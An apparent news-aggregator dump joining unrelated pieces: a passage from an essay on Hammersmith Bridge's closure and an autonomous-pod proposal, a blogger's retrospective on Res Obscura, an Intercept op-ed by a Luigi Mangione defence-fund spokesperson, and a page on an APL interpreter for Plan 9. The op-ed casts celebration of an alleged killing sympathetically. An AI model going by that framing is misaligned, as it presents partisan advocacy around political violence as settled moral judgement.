Left: Fiat 500 (~1 tonne). Right: Volkswagen Transporter (~3 tonnes)

The stabilisation works to date have cost £48m, five times more than the original construction costs for the entire bridge - why is that?

The explanation lies in a fundamental shift in cost structure.

  • The 1887 bridge (£83,000, or £9.4m today) was dominated by material costs (perhaps 60%), with minimal professional fees and zero regulatory costs. 15

  • The 2019-25 stabilisation (£48m cost) inverts this cost structure: labour comprises perhaps 40%, professional fees have tripled to perhaps 18%, and regulatory compliance (a category that didn’t exist in Victorian times) consumes perhaps 12%. 16

No itemised accounts exist for either project, but these estimates are based on comparative studies of similar projects (methodology in footnotes).

There has been a profound increase in the cost of British infrastructure. This cost inflation reflects genuine progress, but of a specific kind.

The Victorians built with brutal efficiency: workers died on their projects (accepted as the cost of doing business), heritage protection was non-existent, and accountability was staked on just one engineer’s reputation.

We have replaced this with a system that is better, but also exponentially more expensive: zero-tolerance safety protocols, Grade II listing requirements, extensive insurance and oversight structures. Regulatory compliance (a category that didn’t exist in 1887) now consumes perhaps 12% of the budget.

The Victorians deployed one engineer and one contractor. The modern stabilisation required six major organisations plus multiple specialist consultancies, quangos and charities. Each improvement is defensible on its own merits. Taken together, however, they create paralysis: costs multiply, timelines extend, and every stakeholder gains effective veto power.

These aren’t individual failures but rather a systemic accumulation of red tape that paralyses progress.

The £250m restoration

The first challenging technical problem is solved: the bridge is now stabilised, albeit at significant expense.

But who will fund the complete restoration to return the bridge to its full operational capacity?

In April 2023, the local council submitted a business case to the DfT for full restoration.

That proposed solution is a double-decker system designed by Foster & Partners: vehicles on top, pedestrians in an enclosed tunnel underneath, walking through a dim passage while traffic roars above their heads.

The cost: £250m (and rising with inflation). The timeline: 10 years from approval, meaning 16+ years total since closure.

There is an irony. The entire justification for this solution is heritage preservation, yet this solution will encase the listed Victorian structure in a visual eyesore, forcing pedestrians into a claustrophobic tunnel, ruining the very heritage it claims to preserve.

Here’s where Britain’s infrastructure dysfunction becomes concrete.

Three players are each committed to funding one-third of any restoration: 17

  • London Borough of Hammersmith and Fulham (LBHF): Local council and bridge owner. £80m total reserves.

  • Transport for London (TfL) : Transport authority strategically responsible for river crossings but financially crippled despite government bailouts post-Covid. Faces a backlog of 100+ critical infrastructure repairs, with Hammersmith Bridge far down the priority list.

  • Department for Transport (DfT) : National government department, normally provides 85% funding for strategic bridge repairs but has slashed commitment to just 33% for Hammersmith.

Since LBHF submitted their restoration plan in April 2023, the DfT has sat on this business case.

Why have they delayed? It is very likely that the £250m restoration will fail the Treasury’s value-for-money tests, but nobody is yet willing to admit that publicly.

The benefits are modest: reconnecting two wealthy areas across a short river crossing with multiple alternatives nearby. The costs are astronomical: £250m for bespoke heritage restoration, taking 10+ years, with each party exposed to inflation risk.

For context, TfL only spent £42m in 10 years between 2010-2021 for the maintenance of all Thames river crossings.

Some would call Hammersmith Bridge a state capacity failure . But let’s be precise about what has actually failed.

Not engineering ability: British engineers remain world-class, and the stabilisation work completed so far is evidence of that. Not resources: the proposed cost is a rounding error in national budget terms.

What has failed is our political capacity: the ability to make decisions, assign responsibility, and accept trade-offs.

We’ve created a planning system in which every actor can block and add cost but where none can decide, where doing nothing is the safest choice.

In the vacuum left by years of inaction, a cottage industry of alternative proposals has emerged.

Baynes & Mitchell proposed a £110m interwoven structure. Sybarite’s inventive mirror-polished steel “ribbon” was dismissed as “another eccentric press stunt” by the council. Anthony Carlile Architects mocked up a temporary barge bridge . The Manser Practice held an internal competition yielding conceptual designs. The Richmond MP proposed licensed rickshaws . 18 LBHF council have “not ruled out” funding restoration via a resident-exempt vehicle toll (though this appears unviable on basic calculations), 19 whilst the DfT briefly considered permanent closure as a monument.

Even friends regularly offer enlightening new suggestions: inhabited bridges (funded through commercial and residential leases); a version of Wuppertal’s Schwebebahn (a public transport monorail operating since 1897); or London’s failed Garden Bridge . 20

The problem is not ingenuity. It is a system that blocks any decision-making.

Here is a more facetious proposal: award the contract to a Chinese state-owned operator.

Why China? Well, China’s bridge engineering operates at a scale that is difficult for those of us in a de-industrialised nation to comprehend.

At least 9 Chinese bridges have been built that would span the English Channel. 21

For instance, the 55km 6-lane trans-oceanic Hong Kong-Zhuhai-Macau Bridge features 23km of elevated sections, a 6.7km immersed vehicle tunnel at 45 metres below sea level, and four artificial islands , completed in just 9 years of construction . 22

The Huajiang Grand Canyon Bridge , completed in September 2025, is furnished with a “ cafe in the clouds ” and an artificial waterfall . It spans 2,890m at a height of 625m above the Beipan River and was built in less than 4 years for ~£220m ( 2.1 billion yuan ), less than the proposed restoration of Hammersmith Bridge. 23

In comparison t these mega-projects, Hammersmith Bridge seems rather modest.

But Britain is not China.

In terms of state capacity , China’s sustained construction programme generates continuous learning and accumulated expertise; Britain builds episodically and as much as half of its wage premium is due to costs rising without corresponding productivity gains. 24

But in terms of values : we demand zero construction deaths, fair wages, and democratic accountability. China’s infrastructure achievements are staggering, but they’re inseparable from its authoritarian system: bridges built without parliamentary debate, villages demolished, environmental concerns overridden, labour protections minimal. The costs mask 8-15 worker deaths per project and £1-8 daily wages and lower build quality. 25

Britain’s paralysis isn’t simply incompetence, it’s the cost of worker safety, political accountability and heritage protection.

The question is not “why can’t we build like China?” but “how do we deliver infrastructure within our political and value system?”

£250m for a restoration is an extraordinary sum of money, so how about we just build a new bridge altogether?

At the January 2025 Taskforce meeting , the DfT proposed a demolition and rebuild . This proposal was rejected as legally impossible given the structure’s Grade II listing. But the heritage protection framework is policy, not immutable law. The Grade II listing was only awarded in 2008.

What would it cost simply to demolish Hammersmith Bridge and build a modern replacement?

The brief (assuming permission were granted) would be demolish the existing structure and build a functional and safe 210-metre Thames bridge crossing at Hammersmith, carrying two vehicle lanes plus pedestrians and cyclists.

Answer : £150-225m . A complete replacement would most likely be a beam bridge and require 4-6 years from project start to completion. Overall contingency 20%. The full methodology for my estimate can be found in the footnotes. 26

To view a sample of comparable international bridges as well as comparable Thames River Crossings ( please follow this link )

There are two caveats to this estimate:

First, I’m not an engineer or architect. This estimate can in no way replace a detailed feasibility study, it is a back-of-the-envelope guess that offers a rough benchmark.

Second, this estimate underplays the vast range of uncertainty in UK infrastructure delivery . Although there is limited ambiguity in the engineering of the bridge itself, the current state of infrastructure construction in Britain means that the final price tag is highly uncertain.

Just compare other recent projects for Thames river crossings. The Rotherhithe Bridge saw costs triple from £100m to £463m before cancellation. The Lower Thames Crossing has spent over £300m on planning alone - more than Norway spent building the world’s longest road tunnel (the Laerdal Tunnel ). The Thames Tideway Tunnel escalated from £1.7bn estimate in 2004 to £4.5bn by completion in 2025. The Silvertown Tunnel cost £2.2bn for a straightforward 1.4km crossing. 27 Or consider High Speed 2 (HS2): £40.5bn spent to date (as of April 2025), having achieved very few of its stated aims. Final cost estimated at over £100bn in today’s money. 28 That includes the £100m bat tunnel and the £100m HS2 bridge to nowhere . 29

Even if the costs of a re-build were acceptable to the Treasury (they’re not) and the legal barriers were removed (they won’t be), demolition would destroy real value. £48m has already been spent stabilising the bridge and this is not simply sunk cost fallacy. The bridge now functions for cyclists, pedestrians, and motorised vehicles up to 3 tonnes, while retaining heritage significance no rebuild could match.

When projects routinely spend hundreds of millions just obtaining permission, throwing away a stabilised structure becomes hard to justify.

The bridge has been closed to motor traffic for six years. Primary school children in Barnes cannot remember when cars could cross. What began as an emergency closure has calcified into permanent car-free status through institutional paralysis.

The solution that is unfolding by default is to do nothing.

This has never been formally proposed, yet everyone’s inaction point towards it. Last month, bridge contractors filed a planning application requesting permission to transport Victorian ironwork to Brighton for long-term storage, indicating no prospect of restoration in the foreseeable future . 30 After all, it could take years or decades before political change unblocks this system to even enable a rebuild, if ever.

To do nothing would imply that vehicle access does not matter. The bridge isn’t really closed - you can still walk or cycle across. And that’s better, isn’t it? We don’t want cars in cities anyway, right? 31

No! A major London transport link has ceased to function, and there are currently no plans to address it. That should not be acceptable in a competently governed society.

We cannot accept this state of affairs.

But first, we must ask the right questions.

When I began researching this piece, my intuition was straightforward: closing a major bridge carrying 25,000 daily vehicles should lead to more traffic on other nearby crossings and less economic activity on either side.

The evidence shows the exact opposite. Today there is less traffic and more economic activity .

How is that possible?

To answer that question, we must understand:

  • What happened to the traffic?

  • What are the social and economic impacts of the closure?

  • Who has been genuinely disadvantaged?

Hammersmith Bridge (May 2018). Source: Alamy
Hammersmith Bridge (2025). Source: Author

When the bridge closed in 2019, 25,000 vehicles crossed it each day.

TfL predicted chaos: a July 2019 impact assessment showed 15,000 additional motorised vehicles per day on alternative crossings and estimated “social dis-benefits to exceed £50m per annum.” Local MPs still cite these figures.

But what does the data show six years on?

Today, there is less traffic and congestion on nearby Thames crossings than before the closure.

The data shows traffic has reduced in almost all the locations where increases were initially recorded. By 2024, overall motor traffic volumes across the affected region had fallen by around 10% more than in the rest of London (25% overall). Likewise, total traffic counts on neighbouring road bridges are lower than pre-closure (charts above).

Putney Bridge shows a different idiosyncratic effect. Traffic initially fell back after the closure in 2019, but delays began to increase in 2023. That sequence of events suggests that there are other variables unrelated to the closure that are impacting travel times.

Putney Bridge. Source: DfT & TfL (via Tom Pike)

Where did the traffic go?

Cycling data provides part of the answer. Richmond Council’s survey revealed that even a few months after closure, 44% of former drivers had already switched to walking or cycling.

Cycle counts across the area are also markedly increased. This is known in the literature as a “ modal shift ”. Richmond-upon-Thames now has one of the highest active travel mode shares in Britain.

So, of the original 25,000 daily trips, most shifted to cycling, walking and public transport, and some moved to other bridges.

But here’s the puzzle: TfL reports that 9,000 vehicles (36%) have simply vanished from the road network entirely - they are no longer visible on any crossing between central London and southwest London.

What happened to those 9,000 journeys that simply evaporated?

Was economic activity lost? Were human connections severed? Did relatives stop visiting grandparents? Did businesses stop making deliveries?

The answer may lie in a counterintuitive phenomenon known as Braess’ Paradox : adding capacity to a congested network can worsen performance, while removing it can improve things. 32

When drivers make individually rational routing decisions, they reach an equilibrium where no single driver benefits from changing route, but this equilibrium is often inefficient for the system as a whole.

In Hammersmith’s case, the closure forced a new equilibrium. The 9,000 vanished vehicles weren’t displaced elsewhere, nor did they represent lost economic activity. They were replaced by alternatives that were more efficient in the new system.

The shopper who made three separate car trips weekly now combines errands or orders online from consolidated delivery services. The school run that meant queueing in traffic now happens on foot or by bike. The commuter who spent 20 minutes driving and searching for parking now cycles in 12 minutes.

After tube strikes, 5% of commuters permanently switch because disruption forces them to discover faster alternatives.

Hammersmith Bridge’s closure worked similarly: people tried new transport modes and often found they were better. 33

When the bridge closed, TfL predicted economic contraction. The opposite occurred.

Mastercard data shows spending in Barnes increased by twice the London average. 34 Spending increased +21% in Barnes (SW13) and +13% in Hammersmith (W6), compared to London’s +9% average. This held even when the bridge was closed to pedestrians and cyclists.

However, this aggregate spending increase does mask a more nuanced set of changes in local business composition. Data from the same Barnes Community Association survey in 2020 suggested that specialist retailers that previously relied on cross-river customers experienced revenue declines, whilst local businesses serving residential communities tended to adapt most successfully. 35

As soon as 2020, the closure appears to have reshaped Barnes’ commercial character towards neighbourhood-focused businesses rather than destination retail, potentially strengthening its role as a local high street. Now, six years later, the local economy has entirely adapted to the new reality.

Reduced pollution likely increased dwell time and spending given that air quality improved at every monitoring station across the region, with nitrogen dioxide levels dropping significantly in Hammersmith, most of Barnes, and even Putney.

Emergency services have reported no impact on response times . The London Ambulance Service stated they have “never released any information about the closure impacting response times,” whilst London Fire Brigade data shows no increase in 999 response times in the Barnes peninsula.

West London’s economy hasn’t contracted; it has adapted. This isn’t suppression of activity; it’s optimisation. Economic vitality requires efficient connectivity, not maximum motorised vehicle throughput.

However, there are important confounding factors .

Since 2019, the entire urban transport landscape has transformed through three major forces largely independent of the bridge closure.

The pandemic (normalising remote work and collapsing commuter traffic), regulatory changes (Low Traffic Neighbourhoods, ULEZ expansion, 20mph zones), and new infrastructure (Elizabeth line, expanded cycling networks).

Disentangling the bridge closure’s impact from these confounding factors is nearly impossible, so it is not possible to attribute all these changes definitively to the bridge closure.

But one impact is clear: west London has adapted to reduced car dependency regardless of whether the bridge closure drove or merely coincided with these changes.

It is not necessarily the case that closing bridges improves transport; but it is undeniably true that people and places adapt when given alternatives.

Infrastructure shapes behaviour.

The closure has created genuine hardship for specific groups.

Elderly and disabled residents have been significantly disadvantaged, having lost direct bus routes across the river to Hammersmith with its step-free Tube access, retail outlets and major hospital. 36 Low-income residents have been disproportionately affected. They’re less likely to own cars or bikes, cannot afford taxi detours, and have lost affordable public transport options. Parents with young children face new challenges. Cycling is not always an option, so any journey across the river has become significantly harder.

Specialised retailers have also lost business. Whilst generic local businesses saw spending increases, specialised retailers relying on customers from across London experienced revenue reductions. Similarly, tradespeople and businesses requiring vehicle access face longer detours. Plumbers, electricians, and builders transporting heavier tools lose time and income. Commercial motorised vehicles merit particular attention given ULEZ parallels, where delivery operators have raised concerns about regulatory burdens. However, unlike ULEZ, the bridge closure affects routing rather than compliance costs.

As a local resident who crosses the bridge every week, I see both sides of this argument:

For certain residents and businesses, the closure has created genuine hardship. Equally, however, the constant gridlock has vanished, the local economy has adapted, and cycling - previously a life-threatening exercise - is now pleasant and safe.

The harms are real, but they do not require a £250m car-restoration project. They require targeted public transport solutions.

Ask residents if they want the bridge reopened to all traffic and the answer is obvious: yes.

Maximum choice will always seem the most convenient option.

But that is the wrong question to be asking. As we have established, a full restoration would cost £250m, take years, and likely require a significant vehicle toll.

Given that reality, what’s the best option?

A 2023 poll tested this exact trade-off, and the response from residents was clear. If the alternative was a toll bridge, 50% of respondents would prefer a car-free bridge with cycling, walking and electric shuttles, with 36% in favour of tolling. Similar results were shown in a FareCity survey from 2019.

Given the actual constraints and costs, residents prefer targeted public transport solutions over expensive vehicular restoration.

Finally, we should address a claim that has shaped the entire debate.

Labour Council leader Stephen Cowan has repeatedly stated that the bridge is “legally required to reopen to cars,” indicating that the Secretary of State instructed him on the council’s “Highways obligations.” This assertion has anchored political negotiations around how to restore full vehicular capacity. Mayor Sadiq Khan has also expressed a desire to re-open the bridge to cars .

But in November 2022, the Department for Transport’s Freedom of Information response categorically contradicted this claim:

“The Department has not given any legal instructions to London Borough of Hammersmith and Fulham regarding the management of the bridge – officials and Ministers have been clear that LBHF is the asset owner and decisions on maintenance and repair are for it to take.”

As the owner, there is no clear legal requirement for the Council to reopen the bridge to cars (as they have likely met their statutory obligations, 37 although any formal highway downgrading would require Traffic Regulation Orders under established statutory procedures). 38

This distinction is not semantic pedantry. If the obligation is political rather than statutory, then the solution space is fundamentally different. The council is not legally bound to pursue a £250m vehicular restoration. It could instead solve the actual mobility problem: providing public transport across the river for those who need it (which may itself be a statutory obligation). 39

Yet this premise has locked the debate around restoring the existing structure to full vehicular capacity.

So what might a solution look like?

In May 2023, a credible and equitable solution for Hammersmith Bridge was proposed, fully designed and costed.

It cost £10m (25x cheaper than the Foster & Partners solution), permitted cycling and walking, fulfilled public transport needs, and crucially abided by the stabilisation’s weight restrictions.

Ten-passenger autonomous electric pods , running every 2-3 minutes during peak times. Each pod weighs under 3 tonnes when fully loaded , comfortably within the bridge’s limits. The fleet would carry 235-282 passengers per hour . Full integration with Oyster cards and contactless payment. A protected two-way cycle lane alongside and pedestrian walkways. Restructured bus routes. The pods would operate in a single lane with passing points at either end. 40

Total cost: £10m . Pod fleet (£3m), highways remodelling (£3.7m), public realm improvements (£0.5m), contingency (£2.8m). Timeline: 24-36 months from approval to operational.

The charity Possible spent 18 months developing this autonomous pod system for Hammersmith Bridge. The solution uses proven technology from New Zealand provider Ohmio . The pods are already used today in New Zealand and multiple international airports .

This solution addresses the genuine harms identified earlier. The autonomous pod system provides:

  • Public transport for those without alternatives : elderly and disabled residents regain direct access to Hammersmith with step-free boarding, young families can cross safely, low-income residents get affordable Oyster-integrated transport.

  • Reduced congestion for essential and commercial vehicle users : with 9,000 trips already evaporated and additional travellers using pods, tradespeople and businesses would experience a net benefit from reduced congestion on alternative crossings.

This is why the pod solution isn’t just cheaper than the £250m restoration - it’s better.

Why autonomous pods rather than conventional public transport? Standard buses weigh 12-18 tonnes, far exceeding the bridge’s 3-tonne limit. Trams require expensive track infrastructure and permanent structural modifications, the weight of which would be incompatible with heritage constraints. 41 Autonomous pods solve this through lightweight design: each 10-passenger pod weighs under 3 tonnes fully loaded, with ten pods providing equivalent capacity whilst staying within structural limits. The system eliminates driver costs (60-70% of bus operating expenses) whilst enabling 2-3 minute headways impossible with human drivers, maximising throughput and cost-efficiency.

Would the pods risk obsolescence? After all, a restored bridge might serve for decades while autonomous technology is evolving rapidly. But in a rapidly changing transport landscape, the pods deliver adaptable infrastructure with manageable operating costs. Vehicles can be upgraded as technology improves at minimal cost and could be operated publicly like TfL services or through private concession with access leasing and passenger charges. In any case, the pods cost a fraction of the £250m restoration which would likely require perpetual subsidy for changing traffic patterns.

Barriers to implementation exist, but none are insurmountable. The Automated Vehicles Act 2024 already provides a legal framework, while Milton Keynes and Solihull already operate these exact Ohmio vehicles on public roads. The most likely bridge-specific challenges such as weight certification, vibration testing, structural approval are procedural requirements, not engineering barriers.

This proposal solves the actual mobility problems faced by local communities rather than restoring a traffic pattern that was already causing gridlock.

Here is the digital visualisation of the proposal (no sound):

What happened to this proposal?

The Centre for Connected and Autonomous Vehicles offered £200,000 for feasibility studies. Possible assembled a consortium including Ohmio, City Science, and City Infinity. Richmond Council and TfL both agreed to support if Hammersmith & Fulham agreed.

Hammersmith & Fulham refused to engage. The deadline passed. The consortium disbanded.

Since then, Ohmio has begun trials in Solihull and Milton Keynes . Waymo and Wayve will trial autonomous taxi services in London in 2026.

The opportunity for the UK’s first autonomous public transport deployment was lost, but the solution remains viable.

Left: Waymo (2025); Right: Ohmio (2024)

What needs to happen now?

  1. End the pretence. LBHF, TfL and DfT must publicly acknowledge what everyone privately knows : the restoration (£250m+) is unfunded and any replacement (£150m+) is equally unfundable.

  2. Open a competitive tender. Tender for public transport solutions within the stabilised bridge’s 3-tonne weight limit. Offer clear requirements: passengers per hour, Oyster-integrated, delivery timeline.Let the market find the most cost-effective solution. Fast-track regulatory approval for the winning proposal. No multi-year planning inquiries for a bridge that’s already been closed for six years.

  3. Create the destination, invest in the approaches. All three bodies also need to invest in regenerating areas at either end: the retail outlets, cycling infrastructure, public realm upgrades, drainage improvements (co-ordinate with the Hammersmith Flyover redevelopment if that proceed).

Recently, there have been some more positive signs. Various local politicians have begun to more clearly express support for prioritising a public transport solution over simply re-introducing cars. LBHF recently trialled yellow rental carts, demonstrating an appetite for testing new modes of transport.

The Possible proposal would have been the UK’s first autonomous vehicle deployment in real-world public transport.

Hammersmith Bridge offers the perfect testing ground: dedicated straight lanes, low speed, controlled environment. The Government has stated its ambition for technology leadership in autonomous vehicles.

That opportunity was lost when LBHF refused to engage, but the solution remains viable.

The bridge is stabilised. The community has adapted. The technology exists. What’s required is simply the political will to choose the future.

Hammersmith Bridge could become a place where Victorian ironwork frames cutting-edge technology. London’s greenest historic crossing could be the testing ground for Britain’s most advanced public transport solution.

Picture it at dusk: Victorian lampposts glowing, pods gliding silently past, cyclists heading home, the swans gliding along the Thames below. The bridge would no longer be a bottleneck that motorists endure, but a bridge people choose to cross.

Designed thoughtfully, Hammersmith Bridge’s public transport vehicles could become a timeless and recognisable feature of London’s urban landscape, alongside other distinctive British icons — red telephone boxes, double-decker buses, or black cabs.

An imagined design. Source: Author

That’s the future for Britain that we should be building - one that is even more beautiful than the past we’re failing to resurrect.

Hammersmith Bridge can be one of the greatest river crossings in the world.

Please do get in touch if you are in a position to help solve this challenge or have any feedback.

Let’s build the future.

Will this solution help us solve the vast problem of Britain’s state crisis?

Of course not. 42

But Hammersmith Bridge teaches a lesson.

Here, the intuitive question based on past assumptions was “how do we restore full vehicular capacity?” The real question we should have been asking ourselves is “how do we solve this mobility problem to ensure a better future?”

While we debate how to restore Victorian infrastructure for outdated traffic patterns, the actual future, autonomous and mass public transport, is materialising around us.

In that sense, Hammersmith Bridge serves as a warning.

If we can’t adapt our thinking here, what hope is there for the toughest problems that we face? For the infrastructure that Britain actually needs to build? For the critical state capacity that we most urgently need to develop? 43

Hammersmith Bridge is the case study; now Britain must start asking the right questions.

This essay was possible because kind people cared enough to help.

Above all, I would like to thank Leo Murray , who led the charity Possible and wrote a definitive report on Hammersmith Bridge which informed so much of this information in this piece.

Tom Pike, Tim Lennon, and Charles Campion generously shared their expertise, data, and years of work on this problem. Their rigorous research and genuine commitment to solving the bridge’s crisis made this analysis possible.

The Looking for Growth team , Lawrence, Ludo, and Jack, provided invaluable support and encouragement throughout.

I am deeply grateful also to friends Quentin, Aeron, Paramvir, Bob and Jemima, who read early drafts and offered thoughtful feedback.

Finally, my most sincere apologies to every friend, family member, and innocent bystander who endured my monologues about Hammersmith Bridge these past months.

Thanks for reading Suburban Mantuan! This post is public so feel free to share it.

Share

Disclaimer : All posts on this site reflect my personal views only and should not be construed as investment, financial, or professional advice. These views do not represent my employer or any affiliated organisation.

Discussion about this post

Ready for more?

I have been writing a niche history blog for 15 years

Hacker News
resobscura.substack.com
2025-12-04 18:49:20
Comments...
Original Article

I was 25 years old when I started writing the blog version of Res Obscura, which ran from 2010 to 2023 (and still exists here ). This was the early summer of 2010. I was a second-year PhD student in history, living with two roommates in a 1920s bungalow on the east side of Austin.

And I was very dedicated to the idea that you should aim to write a new blog post every day:

The first few posts of Res Obscura, all written in an apparently rather frantic week in June of 2010.

This is a concept that the 40-year-old version of me, with two young kids and zero free time, cannot even begin to fathom.

It’s also a practice of the old internet that simply doesn’t exist anymore — one of many digital behaviors that was swallowed up by social media. That whole world of blogging (exploratory, low-stakes, conversational, and assuming a readership of people who had bookmarked your URL and who read it on a desktop or laptop computer) is almost entirely gone now.

My first two years writing Res Obscura in its blog format were great fun. I began to develop an intellectual community, forming contacts with, for instance, the wonderful Public Domain Review (founded 2011 and still going strong). I linked to and was linked to by a range of other history bloggers who I saw as kindred spirits, some of whom seem to have disappeared ( BibliOdyssey ) others of whom have become well-known writers ( Lindsey Fitzharris ).

Get 20% off for 1 year

It was pretty addictive when a post went viral. In those halcyon days when written blog posts about obscure historical subjects were viable sources of viral content, you could end up getting covered in international media for, say, discovering a cat’s paw prints on a 15th century Croatian manuscript.

Readership analytics for the pre-Substack Res Obscura, 2010-present.

That spike in readership around 2018 was partially from a post about 17th century food that, unexpectedly, led to me speaking about snail water on New Zealand public radio .

But by then, I was starting to move on. I was hard at work on my first book — the book I needed to write for tenure — and was becoming a bit dispirited by the increasingly click-bait nature of blogging, not to mention the tendency of social media to elevate toxic behavior and controversy over lovely and fascinating but totally uncontroversial things like the Croatian cat paw prints.

I also (then and now) have no appetite for short-form video content, and still less for the type of history explainer videos — “here’s a two hour deep dive into why this movie is historically inaccurate” or “everything you need to know about such-and-such famous person” — that seem to do well on YouTube.

Switching over to a Substack newsletter, in the summer of 2023 , revived my interest in writing online. It felt like rejoining an intellectual community — not quite the same as the golden age of blogging in the 2000s, but something equally as lively, in a way that I don’t think quite gets enough credit in the 2020s.

From Weird Medieval Guys to

’s Noted to

’s Fernando Pessoa-esque The Hinternet and the newsletters of well-known historians like David Bell ( French Reflections ), as well as the more general audience or politically oriented newsletters that still dig deep into historical topics (like

’s Unpopular Front and

’s newsletter ), I would say that Substack is now the most interesting place online for discussions not just of history, but of humanistic topics as a whole.

Needless to say, there’s also a ton of people writing about the intersection of AI, technology and contemporary society (of which I would single out AI Log , Ethan Mollick’s One Useful Thing ,

, and

).

So why have I kept writing Res Obscura through all the changes of the world — and of my own life and interests — since the summer of 2010? Simple: I love sharing things I find interesting, especially things which are not available elsewhere online. Most of my posts are written because I search for information on something and don’t find it.

The niche nature of Res Obscura (from 17th century cocaine to Kinetoscopes to Henry James: the RPG ) is precisely why I enjoy writing it.

I am deeply grateful that 15 years and 8,300 subscribers later, I have a place online where I can share idiosyncratic knowledge and writing with an equally idiosyncratic group of readers.

Now here’s the inevitable part where I ask if you would be willing to support my continued work. To that end, I have set up a special holiday discount valid until the end of December. Thank you for reading!

20% off a paid subscription

Give a gift subscription

A detail of a trompe-l’œil “dome” by the Renaissance painter Andrea Mantegna , Camera degli Sposi, Ducal Palace, Mantua, Italy. Featured in a 2011 Res Obscura post called “ The Art of Fooling the Eye .”

Share

Luigi, a Year Later: How to Build a Movement Against Parasitic Health Insurance Giants

Intercept
theintercept.com
2025-12-04 18:48:04
The widespread support for Mangione shows America is ready to mobilize to build a more humane health care system. The post Luigi, a Year Later: How to Build a Movement Against Parasitic Health Insurance Giants appeared first on The Intercept....
Original Article
NEW YORK, NEW YORK - DECEMBER 02: Luigi Mangione appears for the second day of a suppression of evidence hearing in the killing of UnitedHealthcare CEO Brian Thompson in Manhattan Criminal Court on December 02, 2025 in New York City. Mangione's lawyers will argue to have the evidence thrown out because police officers allegedly did not read Mangione his Miranda rights and did not have a proper warrant when they searched his backpack at a Pennsylvania McDonald's last December. He is accused of fatally shooting UnitedHealthcare CEO Brian Thompson and faces state and federal murder charges. (Photo by Curtis Means-Pool/Getty Images)
Luigi Mangione appears for the second day of a suppression of evidence hearing in the killing of UnitedHealthcare CEO Brian Thompson in Manhattan Criminal Court on Dec. 2, 2025 in New York City. Photo: Curtis Means/Pool via Getty Images

Sam Beard is a spokesperson for the December 4 Legal Committee, whose book Depose: Luigi Mangione and the Right to Health is available for pre-order at illwilleditions.com.

Luigi Mangione’s legal defense fund has swelled to more than $1.3 million and is still growing daily. As the December 4 Legal Committee, we created that fund — but it would mean nothing without the donations, prayers, and support of people from around the world. As corporate social media platforms censored support for Luigi , the fundraiser page became a place for people to share stories of senseless death and suffering at the hands of the for-profit health insurance industry in this country.

There is a deep irony in the widespread support for Luigi. People celebrate an alleged murderer not because they hate reasonable debate or lust for political violence, but out of respect for themselves and love for others. Across the political spectrum, Americans experience the corporate bureaucracies of our health care system as cruel, exploitative, and maddening. They feel powerless in the face of the unnecessary dehumanization, death, and financial ruin of their neighbors and loved ones.

One year ago, the December 4 killing of United Healthcare CEO Brian Thompson temporarily suspended the usually intractable left vs. right polarization of America. Ben Shapiro’s audience revolted when he accused Luigi supporters of being “evil leftists.” Donors to Luigi’s fund come from across the political spectrum, and a common theme among them is their acute realization that the political differences of the culture war are largely manufactured to benefit the powerful. This was a crucial difference between Mangione’s alleged act and, for example, the assassination of Charlie Kirk . While the latter intensified existing political divides , the former seemed to strike upon the common ground of a different political landscape: from red vs. blue, or left vs. right, to down vs. up .

Luigi Mangione’s mugshot painted by the artist Sam McKinniss. Courtesy: Sam McKinniss

But a year on, it is clear that even bipartisan public support for killing a health care CEO on the street and the endless stories of suffering and death as a result of insurance claim denials are not enough to depose the for-profit health care system. Today, Medicare for All looks even more politically unrealistic than when Bernie Sanders made it the centerpiece of his presidential campaign.

This fact poses a challenge for Luigi’s supporters: Will his alleged act be remembered as nothing more than a salacious contribution to the true crime genre? Will we settle for him being installed as an edgy icon of celebrity culture, used to market fast-fashion brands and who knows what next?

We do not think his supporters, or anyone else who believes that health care is a human right, should accept that. But what would it take to make the events of last December 4 into a movement to build a more humane health care system in America?

The time has come for the long struggle for the right to health care to make a strategic shift from protest to political direct action.

For the last year, we have been asking this question of medical professionals, community organizers, scholars, and ourselves.

In our forthcoming book , “Depose: Luigi Mangione and the Right to Health,” we offer the beginnings of an answer: The history of the struggle for the right to health in America shows that it is indeed politically unrealistic to expect politicians to deliver it from above — but our own dignity and intelligence demands that this right be asserted by all of us from below. The widespread support for Luigi shows that the time has come for the long struggle for the right to health care to make a strategic shift from protest to political direct action.

Consider the sit-in movements to end Jim Crow laws and desegregate American cities. These were protests, insofar as participants drew attention to unjust laws — but they were also political direct actions. Organizers were collectively breaking those laws, and in doing so, were enacting desegregation . Activists organized themselves to support and protect each other in collectively nullifying laws that had no moral authority and, in the process, acted as if they were already free. This is what we mean by a shift from protest to direct action.

Less well known is the role of direct action in winning the eight-hour workday . For half a century, industrial workers had been struggling to shorten their hours so they could have some rest and joy in their lives. One decisive moment in this struggle came in 1884, when the American Federation of Labor resolved that two years later, on May 1, their workers would enact the eight-hour day. After eight hours, they would go on strike and walk off the job together. They called on other unions around the country to do the same and a number did — including in Chicago, where police deployed political violence to attack striking workers, killing two. While this action did not immediately win the struggle everywhere, it did succeed in beginning to normalize the 8-hour day and raised the bar for everywhere else to eventually do the same. The key is that this could only happen when workers stopped demanding something politically unrealistic and started changing political reality themselves.

The struggle for the right to health care has been ongoing in the United States for at least a century. At every turn, it has been thwarted by industry lobbyists and the politicians they control . But what would it look like to strategically shift the struggle for the right to health care in the U.S.? How would health care providers go on strike or engage in direct action without harming patients?

We found the beginning of an answer from Dr. Michael Fine, who has called on his fellow physicians to organize for a different kind of strike: not halting all their labor, but stopping the aspects of their work that are unrelated to their responsibility as healers. Fine writes, “We need to refuse, together, to use the electronic medical records until they change the software so that those computers free us to look at and listen to patients instead of looking at and listening to computer screens.”

All of us could organize to free the labor of health care from the corporate bureaucracies that act as parasites on the relationship between caregiver and patient.

A strike by health care workers could mean not the cessation of care, but liberating this critical work from the restraints imposed by profit-seeking companies . Beginning from this idea, all of us could organize to free the labor of health care from the corporate bureaucracies that act as parasites on the relationship between caregiver and patient.

If we step outside of our usual political bubbles and into a direct action movement to assert the universal right to health care, we might find that the common ground that Luigi’s alleged actions exposed is the precise point from which the wider political landscape may be remade.

APL for Plan9

Lobsters
apl.pmikkelsen.com
2025-12-04 18:27:17
Comments...
Original Article

Introduction

This is the website for APL9, which is an APL implementation written in C on and for Plan 9 (9front specifically, but the other versions should work as well).

Work started in January 2022, when I wanted to do some APL programming on 9front, but no implementation existed. The focus has been on adding features and behaving (on most points) like Dyalog APL . Speed is poor, since many primitives are implemented in terms of each other, which is not optimal, but it helped me implement stuff easier.

Note: development is still very much on-going. Some primitives may be implemented wrong at this point, since it can be hard to implement them without ever having used them ☺.

Features

  • Dfns work, but the error guards are not implemented yet
  • Function trains
  • Most primitive functions from Dyalog APL
